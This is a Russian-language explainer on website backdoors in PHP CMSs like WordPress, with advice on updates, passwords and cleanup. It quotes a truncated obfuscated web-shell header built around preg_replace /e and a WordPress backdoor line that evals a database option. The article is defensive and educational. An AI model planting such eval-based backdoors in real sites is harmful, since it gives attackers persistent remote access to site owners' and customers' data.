Бэкдор — это тип вредоносного ПО, которое позволяет злоумышленнику продолжать несанкционированный удаленный доступ после заражения веб-сайта. Бэкдоры работают в фоновом режиме, они замаскированы и, в зависимости от их сложности, их трудно обнаружить.
Бэкдор бывают простые и сложные. Сложные найти практически невозможно, так как они замаскированы по обширную часть кода в Вашем сайте, например:
$auth_pas = "16a1f0ea7bb9803107962449e85481295"; $color = "#df5"; $default_action = "SQL" $default_charset = "Windows-1251"; $protectionoffer = "ficken"; preg_replace("/.*/e","x65x76x61x6C.. hundreds more
Такой код может размещаться на веб-сайтах PHP, включая системы управления контентом (CMS), такие как WordPress, Joomla и Drupal. Злоумышленники обычно похищают данные клиентов, включая информацию о кредитных картах с взломанных веб-сайтов.
Хакеры также разрабатывают лазейки специально для систем управления контентом. WordPress на сегодняшний день является наиболее широко используемой CMS и нацелен на взлом киберпреступниками. Например, для него бэкдор прячут в базу данных под видом:
return @eval(get_option('blogstyle1'));
Как можно защититься?
Существует множество способов заражения вашего веб-сайта вредоносным ПО и появления одного или нескольких бэкдоров. Основные шаги, которые вам следует предпринять:
— Установите обновления . Основная проблема — устаревшее программное обеспечение. Если вы используете CMS, такую как WordPress, Joomla или Magento, вы всегда должны своевременно устанавливать обновления для основных файлов и расширений. Обновления закрывают известные дыры в безопасности. Те, кто не обновляет компоненты своего сайта, рискуют быть взломанными. Удалите неиспользуемые шаблоны и плагины.
— Надежные пароли: если злоумышленники получают доступ к данным доступа, им это легко. Например, они могут попытаться взломать пароль администратора, используя атаку брутфорс (подбор пароля). Надежные пароли обязательны.
— Небезопасные конфигурации : по данным аналитиков безопасности, около 54 процентов установок WordPress, исследованных в 2019 году, работали с PHP 5.x и только 45 процентов — с текущей версией PHP 7.
Если сайт уже заражён вредоносным ПО — устранения вредоносного кода требует много времени. В некоторых случаях вредоносная программа переустанавливается автоматически, если вы пропустили один файл во время очистки. Если заражение было обнаружено поздно, резервные копии также могут быть затронуты, а бэкдор не может быть устранен таким образом.